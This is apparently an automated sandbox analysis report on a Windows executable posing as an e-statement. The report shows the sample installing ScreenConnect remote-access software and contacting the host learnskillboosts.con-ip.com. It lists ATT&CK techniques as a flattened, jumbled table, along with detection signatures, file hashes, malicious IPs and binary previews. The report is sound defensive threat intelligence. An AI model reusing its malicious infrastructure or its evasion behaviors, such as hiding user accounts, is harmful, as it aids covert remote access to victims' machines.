                                  OS Credential Dumping11
                                  Peripheral Device Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  2
                                  Encrypted Channel
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
                                  Replication Through Removable Media
                                  1
                                  Native API
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory1
                                  File and Directory Discovery
                                  Remote Desktop ProtocolData from Removable Media1
                                  Non-Standard Port
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts12
                                  Command and Scripting Interpreter
                                  1
                                  Component Object Model Hijacking
                                  1
                                  Component Object Model Hijacking
                                  1
                                  Obfuscated Files or Information
                                  Security Account Manager55
                                  System Information Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts
                                  1
                                  Valid Accounts
                                  1
                                  Software Packing
                                  NTDS31
                                  Security Software Discovery
                                  Distributed Component Object ModelInput Capture1
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service
                                  1
                                  Access Token Manipulation
                                  1
                                  DLL Side-Loading
                                  LSA Secrets2
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit
                                  2
                                  Windows Service
                                  1
                                  DLL Search Order Hijacking
                                  Cached Domain Credentials61
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                                  Process Injection
                                  1
                                  File Deletion
                                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                                  Masquerading
                                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  Valid Accounts
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Access Token Manipulation
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd61
                                  Virtualization/Sandbox Evasion
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                                  Process Injection
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Hidden Users
                                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Bootkit
                                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Rundll32
                                  Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569510 Sample: estatement020134230003.exe.... Startdate: 05/12/2024 Architecture: WINDOWS Score: 48 57 learnskillboosts.con-ip.com 2->57 65 Multi AV Scanner detection for submitted file 2->65 67 .NET source code contains potential unpacker 2->67 69 .NET source code references suspicious native API functions 2->69 71 5 other signatures 2->71 8 msiexec.exe 94 48 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 estatement020134230003.exe.virus.exe 6 2->15         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 45 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->45 dropped 47 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->47 dropped 49 C:\...\ScreenConnect.ClientService.exe, PE32 8->49 dropped 53 10 other files (1 malicious) 8->53 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 19 msiexec.exe 8->19         started        21 msiexec.exe 1 8->21         started        23 msiexec.exe 8->23         started        59 learnskillboosts.con-ip.com 195.250.25.144, 49720, 8041 OPTIMITYGB United Kingdom 12->59 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 25 ScreenConnect.WindowsClient.exe 12->25         started        28 ScreenConnect.WindowsClient.exe 2 12->28         started        51 estatement020134230003.exe.virus.exe.log, ASCII 15->51 dropped 81 Contains functionality to hide user accounts 15->81 30 msiexec.exe 6 15->30         started        61 127.0.0.1 unknown unknown 17->61 file6 signatures7 process8 file9 33 rundll32.exe 11 19->33         started        83 Creates files in the system32 config directory 25->83 85 Contains functionality to hide user accounts 25->85 55 C:\Users\user\AppData\Local\...\MSIE1B2.tmp, PE32 30->55 dropped signatures10 process11 file12 37 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 33->37 dropped 39 C:\...\ScreenConnect.InstallerActions.dll, PE32 33->39 dropped 41 C:\Users\user\...\ScreenConnect.Core.dll, PE32 33->41 dropped 43 4 other files (none is malicious) 33->43 dropped 63 Contains functionality to hide user accounts 33->63 signatures13

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  estatement020134230003.exe.virus.exe18%ReversingLabsWin32.PUA.ConnectWise
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Windows\Installer\MSIEAEA.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSIEDBA.tmp0%ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://wixtoolset.org/news/0%Avira URL Cloudsafe
                                  http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v0%Avira URL Cloudsafe
                                  http://wixtoolset.org/releases/0%Avira URL Cloudsafe
                                  https://fs.microsoft0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  learnskillboosts.con-ip.com
                                  195.250.25.144
                                  truetrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://g.live.com/odclientsettings/Prod.C:edb.log.10.dr, qmgr.db.10.drfalse
                                      high
                                      http://crl.ver)svchost.exe, 0000000A.00000002.2586908435.000001DEC1000000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000A.00000003.1413623593.000001DEC0F50000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drfalse
                                          high
                                          http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350297862.0000000004803000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://fs.microsoftsvchost.exe, 0000000A.00000002.2585076024.000001DEBBA13000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350297862.0000000004803000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameestatement020134230003.exe.virus.exe, 00000000.00000002.1337617733.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.2589424535.0000000002099000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350297862.0000000004803000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                              high
                                              https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                195.250.25.144
                                                learnskillboosts.con-ip.comUnited Kingdom
                                                57276OPTIMITYGBtrue
                                                IP
                                                127.0.0.1
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1569510
                                                Start date and time:2024-12-05 19:50:17 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 4s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:estatement020134230003.exe.virus.exe
                                                Detection:MAL
                                                Classification:mal48.evad.winEXE@18/57@2/2
                                                EGA Information:
                                                • Successful, ratio: 80%
                                                HCA Information:
                                                • Successful, ratio: 57%
                                                • Number of executed functions: 235
                                                • Number of non-executed functions: 5
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target rundll32.exe, PID 7556 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                • VT rate limit hit for: estatement020134230003.exe.virus.exe
                                                TimeTypeDescription
                                                13:51:27API Interceptor2x Sleep call for process: svchost.exe modified
                                                No context
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                OPTIMITYGBsora.arm.elfGet hashmaliciousMiraiBrowse
                                                • 195.250.25.43
                                                http://ymc8.informz.net/z/cjUucD9taT0zOTI4MzU0JnU9NDExMjkzMTk0JmxpPTQxMDE5ODI2Jmw9aHR0cHM6Ly9iNGIwbGF0LXQzbm4xNS1jMHVyNy1iNDExMG4uczMuZXUtd2VzdC0xLmFtYXpvbmF3cy5jb20vaW5kZXguaHRtbA==/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 195.250.27.25
                                                https://u20079091.ct.sendgrid.net/ls/click?upn=u001.YG2VXnqaxE2DWZlpLZ9SjIajFk1el8E-2BxvnRO1XoGx0wJoepVSUGItQM5aHsdATtE0jedYbBUBtgqz2uhNN9gjLsdTG-2Fbt4H8IvFP5mAdQDEtE1I896UTzxpAexQJnNFA0VZ8Efhk1K17rVt795ZVyG0nmJexERHLOmNvES-2BqCaCFB8ike7gWeGnuILe-2FshggSw2TEWpiR2QqkIFY-2BUmMg-3D-3DeRQ6_Qhakip-2Bt1UNEAeuBl0Loy2ZK1HADvzM-2BqA2YtL2VvsJ7HZoMrhVnK5v4UwoCx6-2B10hrQ-2BzTJBj5rfflbaivNJm7oyu6blKePzfyMAiy-2FU0w-2Fx08oY7fEVlRg4LGeA3oglZdJItgnOM4Fs9QN24O9ia6n588Ol6keQw2yFoObgykePdYJAzzDE-2Fy1DrvGzkoWZPwRq3HH4cuiCCtP29Xx8A-3D-3DGet hashmaliciousUnknownBrowse
                                                • 195.250.27.25
                                                https://u20079091.ct.sendgrid.net/ls/click?upn=u001.YG2VXnqaxE2DWZlpLZ9SjIajFk1el8E-2BxvnRO1XoGx0wJoepVSUGItQM5aHsdATtE0jedYbBUBtgqz2uhNN9gjLsdTG-2Fbt4H8IvFP5mAdQDEtE1I896UTzxpAexQJnNFA0VZ8Efhk1K17rVt795ZVyG0nmJexERHLOmNvES-2BqCaCFB8ike7gWeGnuILe-2FshggSw2TEWpiR2QqkIFY-2BUmMg-3D-3DeRQ6_Qhakip-2Bt1UNEAeuBl0Loy2ZK1HADvzM-2BqA2YtL2VvsJ7HZoMrhVnK5v4UwoCx6-2B10hrQ-2BzTJBj5rfflbaivNJm7oyu6blKePzfyMAiy-2FU0w-2Fx08oY7fEVlRg4LGeA3oglZdJItgnOM4Fs9QN24O9ia6n588Ol6keQw2yFoObgykePdYJAzzDE-2Fy1DrvGzkoWZPwRq3HH4cuiCCtP29Xx8A-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                • 195.250.27.25
                                                https://u20079091.ct.sendgrid.net/ls/click?upn=u001.YG2VXnqaxE2DWZlpLZ9SjIajFk1el8E-2BxvnRO1XoGx0wJoepVSUGItQM5aHsdATtE0jedYbBUBtgqz2uhNN9gjLsdTG-2Fbt4H8IvFP5mAdQDEtE1I896UTzxpAexQJnNFA0VZ8Efhk1K17rVt795ZVyG0nmJexERHLOmNvES-2BqCaCFB8ike7gWeGnuILe-2FshggSw2TEWpiR2QqkIFY-2BUmMg-3D-3DeRQ6_Qhakip-2Bt1UNEAeuBl0Loy2ZK1HADvzM-2BqA2YtL2VvsJ7HZoMrhVnK5v4UwoCx6-2B10hrQ-2BzTJBj5rfflbaivNJm7oyu6blKePzfyMAiy-2FU0w-2Fx08oY7fEVlRg4LGeA3oglZdJItgnOM4Fs9QN24O9ia6n588Ol6keQw2yFoObgykePdYJAzzDE-2Fy1DrvGzkoWZPwRq3HH4cuiCCtP29Xx8A-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                • 195.250.27.25
                                                UyWmCsMy4T.elfGet hashmaliciousMiraiBrowse
                                                • 195.250.25.70
                                                67gneXXY2P.elfGet hashmaliciousUnknownBrowse
                                                • 195.250.25.51
                                                hYxGptbUmA.elfGet hashmaliciousUnknownBrowse
                                                • 195.250.25.46
                                                8iolWfLe1f.elfGet hashmaliciousUnknownBrowse
                                                • 195.250.25.67
                                                1K9kczvvnW.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 195.250.25.53
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dllSupport.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  f53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        f53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):219459
                                                                    Entropy (8bit):6.583040489653854
                                                                    Encrypted:false
                                                                    SSDEEP:3072:9q9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGm:9quH2aCGw1ST1wQLdqvm
                                                                    MD5:16FC2832603B6CB7AA273DA87B3D4A1F
                                                                    SHA1:B25B42941CB8886D884E57D42D84D9990783E4B4
                                                                    SHA-256:CD8EDBEFCC85D9DEA89768896422818C8F03E85C3C176A95006EEB7C4F916660
                                                                    SHA-512:02CEC6C95CD1D1B3544B9CD4CFD9221724E2DC57DA8F85D2A293C95A8B394C60D790A062696F60A6ED21E247C1CA5BE219C7235225F5E38079C87D60EE5BCD30
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\60e8b8.rbs, Author: Joe Security
                                                                    Preview:...@IXOS.@.....@ln.Y.@.....@.....@.....@.....@.....@......&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}'.ScreenConnect Client (8d1a70ac1b2b845c)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (8d1a70ac1b2b845c)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{0538C68F-6B94-515B-2F2F-CF0387A3F483}&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.@......&.{3F8D40B9-5B5A-1351-B0FC-58D0F623492D}&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.@......&.{007A566B-98B8-78D8-8988-2721161F84D6}&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.@......&.{4F67E327-62FF-563B-D336-42D3F4BD89CF}&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.@......&.{695FD779-1A64-EDE3-F05F-A5BC6109313C}&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.@......&.{0A79C25A-0257-462F-4341-681CA4B48D67}&.{F4AC94C9-4954-76D1-AA9E
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):50133
                                                                    Entropy (8bit):4.759054454534641
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                    MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                    SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                    SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                    SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):26722
                                                                    Entropy (8bit):7.7401940386372345
                                                                    Encrypted:false
                                                                    SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                    MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                    SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                    SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                    SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                    Malicious:false
                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):197120
                                                                    Entropy (8bit):6.586775768189165
                                                                    Encrypted:false
                                                                    SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                    MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                    SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                    SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                    SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: Support.ClientSetup.exe, Detection: malicious, Browse
                                                                    • Filename: f53WqfzzNt.exe, Detection: malicious, Browse
                                                                    • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                    • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                    • Filename: f53WqfzzNt.exe, Detection: malicious, Browse
                                                                    • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                    • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                    • Filename: hB52OUUCE2.exe, Detection: malicious, Browse
                                                                    • Filename: lCwus2wfk6.exe, Detection: malicious, Browse
                                                                    • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                    Process:C:\Windows\System32\msiexec.exe
